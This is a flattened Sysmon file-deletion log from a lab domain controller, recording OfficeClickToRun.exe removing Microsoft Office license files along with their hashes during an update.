23542300x800000000000000067916Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioPro2019MSDNR_Retail-ppd.xrm-msMD5=C19B8751A2BCE4B9618EB4EE91EC18A8,SHA256=EDEA1CD0CABB9D78EFDB509FDE3FA04DE81C6477A61436F6F62C1953C5B16B33,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067915Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioPro2019MSDNR_Retail-pl.xrm-msMD5=C96B0259C24952F455ACE39785E36F82,SHA256=6BC8ACEB0247F8CAACA74C137CA73918626ADA714C80D16721C45DC6AFD91DDE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067914Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioPro2019DemoR_BypassTrial180-ul-oob.xrm-msMD5=6AA47188FBBBD10831AB350CDB62D2C1,SHA256=16E838619246CFE74B884191D7BC1B02F2A1A0A181C0849CAAF020C9A97C18E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067913Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioPro2019DemoR_BypassTrial180-ppd.xrm-msMD5=D8FECA156BEF14DBDFF7A7426834A4F9,SHA256=6BB93961DD2A395FB548D0AEA8F38FB1CA9F9AB821305A2C1393ACDA7E5B9A18,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067912Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\StandardVL_MAK-ul-phn.xrm-msMD5=A887542C709E5626D5B8D98AD31377FF,SHA256=2BE335649EED151DDCC4C37CB99535BD08899C118C183A4B18F84B86BDEE4F30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067911Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\StandardVL_MAK-ul-oob.xrm-msMD5=1BE28D762E44508D46A12039EC77D1F9,SHA256=ABFD1D4BE4086F7CF4D95271EAC69FFD062CC451B54EE16DDEFE57EC9D0CB91E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067910Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\StandardVL_MAK-ppd.xrm-msMD5=0B780D84B00888A8E001FEEF3F91FF8C,SHA256=A926F8439C96FAA88A490526A3265F99DC8654512E30B2F4AEB0275586320ACD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067909Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\StandardVL_MAK-pl.xrm-msMD5=C42916BB6BBA311D63E502855017E3D2,SHA256=0942D9B57D3A6E6BBB9C65212A35C76CF34221A769CEEB811CA6503BD1902A9C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067908Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\StandardVL_KMS_Client-ul.xrm-msMD5=D18EF8A0797E197E05C371A3C9643E8F,SHA256=04FD0D37A5533E986E2DAC8BEB4CB543F83B0A0494B37ECD0FB66A1F04C11260,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067907Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\StandardVL_KMS_Client-ul-oob.xrm-msMD5=B6D2B8B640AE3C8D01D057D320E8542F,SHA256=6B3A56805ADC993FFBFDFAAE57B896405FC232DF0FB05425F923E83ED660E43E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067906Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\StandardVL_KMS_Client-ppd.xrm-msMD5=7F71691AB4E11226A736EB7B2EADCEAA,SHA256=02982C2F47B20F9D6A8F63952DE93DCF049C8C5E6FE2624C9D7B78C26122F722,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067905Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\StandardR_Trial-ul-oob.xrm-msMD5=0F8BC609BE39AC1BF85B36CF6F049C17,SHA256=E40A31BFC4BD94E87C536F866346231225582CAB7E84A43EB4073EAF8588A6EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067904Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\StandardR_Trial-ppd.xrm-msMD5=EA61E3FD5F30F1E31C602EF20F02C506,SHA256=DE1AE6214ED987D01D17E49E32AE9572AF2E4B4B5B863DE5A8ECD72FD8F6C5B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067903Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\StandardR_Trial-pl.xrm-msMD5=4B1A6F48664458CFF6A8D03BCF5D81F4,SHA256=EDC5D416AA3391F2B1165DFBC98F72DF995F39FC1504AF8A0D1E3C737577F7BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067902Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\StandardR_Retail-ul-phn.xrm-msMD5=409F575F427BC25F2E3EAFDDF5423C93,SHA256=CF0B2F822DE8802C77B6B349F95AA90AAB9947E3D4B13F73453B74AF5A682A94,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067901Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\StandardR_Retail-ul-oob.xrm-msMD5=2AE81DB00155C042FC487B25C370F3EE,SHA256=848EC8282ADB149B17BD641DAEE26F32FDE3EEA6FB07565225527733C0035143,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067900Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\StandardR_Retail-ppd.xrm-msMD5=B191DA6D793474B0AA8D9B8C1D5801D0,SHA256=F38651854483848EA89540D83C4A7E700A6EFB15FE96027F445B8C800810A35D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067899Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\StandardR_Retail-pl.xrm-msMD5=FA8F28AFB87176C073B82486CA111742,SHA256=FF4E161E27CA154C464D925E4D2BEE5698B812E49B2509EE85DDE2F386CA47BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067898Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\StandardR_Grace-ul-oob.xrm-msMD5=A8AC21698910D49FE6A2E827A94E39E9,SHA256=ED16626E2661937EAD86A0513E13F1EE182E21FE15CC0D840F2C13CC42DEAC5D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067897Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\StandardR_Grace-ppd.xrm-msMD5=764BC62AAE2D568F4ED3390F37776F5C,SHA256=C65EE22E48F86AF9453D862292BBD5075B6D8632BB7D16FD53857968CE9A8CB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067896Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\StandardMSDNR_Retail-ul-phn.xrm-msMD5=2D6290165DAA48F0A7EBC73139232292,SHA256=DE2759A7CC40D6A44E1C8415BC3BE578AE1ED244F5F0005888242F0CCE81DC90,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067895Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\StandardMSDNR_Retail-ul-oob.xrm-msMD5=0BA0736F18A3E06A9E366A257ED77BCE,SHA256=F493BC814AECA544A987E26D740EA645514C6B00C83F37F1CFBA4D1519CA9F72,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067894Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\StandardMSDNR_Retail-ppd.xrm-msMD5=F81E10D79889281DC15EA25F360FC062,SHA256=D303FC6CD3DEB1DADE86D7335D6CC0DF22C6663EA2D47E8FA1EC019870282C63,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067893Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\StandardMSDNR_Retail-pl.xrm-msMD5=447D4F976D0E7AB36110B75224F140A3,SHA256=028611F1E4180A52A6E2585CC34CC58E0C7E6D88D90CCC74919CFD4199F1BAD1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067892Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Standard2019VL_MAK_AE-ul-phn.xrm-msMD5=AAC7D4ECBCDE7359D7BB07D8E93E0A22,SHA256=23A11DC24AEF3F02222C799CC819A68FF79DB569DB2FF4333CBC0D5EA9157240,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067891Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Standard2019VL_MAK_AE-ul-oob.xrm-msMD5=BAA9743126E33F684DC835EB5DDDB231,SHA256=EB07262EF55E4B1D6F91AE7F2DC8BC358071B539AF1BDAA83FE89A1C6A1FF228,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067890Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Standard2019VL_MAK_AE-ppd.xrm-msMD5=DD14629971B49122E3FDFA2C09C679F2,SHA256=715EC18A5945EDB43A057BCE9369B217E38CAFB60743DDBE35FD2A89DE45CF66,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067889Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Standard2019VL_MAK_AE-pl.xrm-msMD5=B5DF43C8CFB8B71EF5744A563ACCB53C,SHA256=CA338018C43446AC7EC59DA6B76AD5BEC58B781CAFD437DDDA173C361A85D506,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067888Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Standard2019VL_KMS_Client_AE-ul.xrm-msMD5=EA137957DF9E5F487D27FF048A752420,SHA256=D1252D47F2D978B48625C73A3E48812080F4620643646FDF118F13C334138BF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067887Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Standard2019VL_KMS_Client_AE-ul-oob.xrm-msMD5=98358AF568174902A9667FB3F9C3B096,SHA256=354AF11078D5332B637A65B1F90B220C8F177DE57DF771BD4F0F3B9CA15DB767,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067886Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Standard2019VL_KMS_Client_AE-ppd.xrm-msMD5=A1F47C180B3E1641603DB9D96054E32E,SHA256=847F0AD945AEA0ADB47FADEB84EB189612C0DEFAC238103EBC22BFD6B96E96A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067885Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Standard2019R_Trial-ul-oob.xrm-msMD5=7C51080478472BC13B7122CEF0605804,SHA256=1950054A29696EE6D15978178B289366AF52A17867CCB812543081B75A6BA6B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067884Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Standard2019R_Trial-ppd.xrm-msMD5=8294F6534AEF327145486CE05E61327C,SHA256=F13578DEFEDA9F9378CEB7411200F7B7D336E92217CD04F9E6F1ED703E1073AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067883Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Standard2019R_Trial-pl.xrm-msMD5=BD48FD05E9A31307349FD08628A35FC2,SHA256=9F4950927E32279FAF501D47F1CFBCFD4756ED9EB1172B8126F7E31CD44CE30F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067882Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Standard2019R_Retail-ul-phn.xrm-msMD5=CCBCCBF3E4EDC343CB40A4176D4A9542,SHA256=FB9E428CD1C62D9E64AE39A95123623965E76A6DFE92DBAB4BA48CC1CD180A29,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067881Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Standard2019R_Retail-ul-oob.xrm-msMD5=444479D6B54E9DFDF9CEF1F814B50D00,SHA256=C74B1C7163B51B48E8678BB6BC826EB75DFE190ED4D3B36D7F35512DD659634D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067880Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Standard2019R_Retail-ppd.xrm-msMD5=8EDA9B26B3088A0A503426B6A683D4BE,SHA256=7B2421644D9D565673A7BF466A11D7E93038A74B5959943795498ACC087ED3CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067879Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Standard2019R_Retail-pl.xrm-msMD5=D0C6FBA75B2B4234B92EE0D9320E779F,SHA256=D3E0DC7604D62941C0FC71537CEDDAD428575DC84FBF87985BC3238950A0AB61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067878Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Standard2019R_Grace-ul-oob.xrm-msMD5=33A2452DBECA70712C9E21E30F044CF8,SHA256=BE63B8D2EC17C1B1B83B05248F3D7E531B99296FD8179CF804E3927FAB7E920C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067877Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Standard2019R_Grace-ppd.xrm-msMD5=8F4319ACCB7A0E68B693F8AC6B924BA1,SHA256=D280A67C0B4586E092518CF912BE28EE34F78ADF7BF37959924D675D3CDF82FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067876Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Standard2019MSDNR_Retail-ul-phn.xrm-msMD5=B25CFE57BEB38BB18C03562D20EF6F83,SHA256=415A7C8BD1F6711DCB026ACE670CA21A8E19D58B6FAACA95A74BB99DFBE8CCC6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067875Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Standard2019MSDNR_Retail-ul-oob.xrm-msMD5=79E5E6E52C20F6FD46270630225F8E0C,SHA256=4DB833333EABC87FB92BDF9A813E650D6D81DE8CA798871C30FDA55FAF44BC79,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067874Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Standard2019MSDNR_Retail-ppd.xrm-msMD5=E4350340762DE2F57DE12084DAC6EC82,SHA256=F9BD1B2B1D2F95A68F8B39C39A357120B2B8D9B6B4F2421E7AAE76BE78116A03,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067873Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Standard2019MSDNR_Retail-pl.xrm-msMD5=4ED328816FD60E660D236711CBD00362,SHA256=E1573897C6357326BEA8D23002CB98F93CBBF007480096E1F711A65177B0F7DC,IMPHASH=00000000000000000000000000000000falsetrue 